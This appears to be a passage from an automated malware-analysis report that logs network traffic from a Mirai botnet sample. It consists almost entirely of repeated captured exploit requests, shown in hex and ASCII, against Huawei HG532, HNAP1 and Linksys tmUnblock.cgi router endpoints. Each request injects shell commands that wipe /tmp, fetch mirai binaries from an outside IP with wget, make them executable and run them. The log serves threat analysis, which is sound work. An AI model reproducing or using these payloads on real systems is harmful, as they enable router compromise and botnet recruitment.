2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo 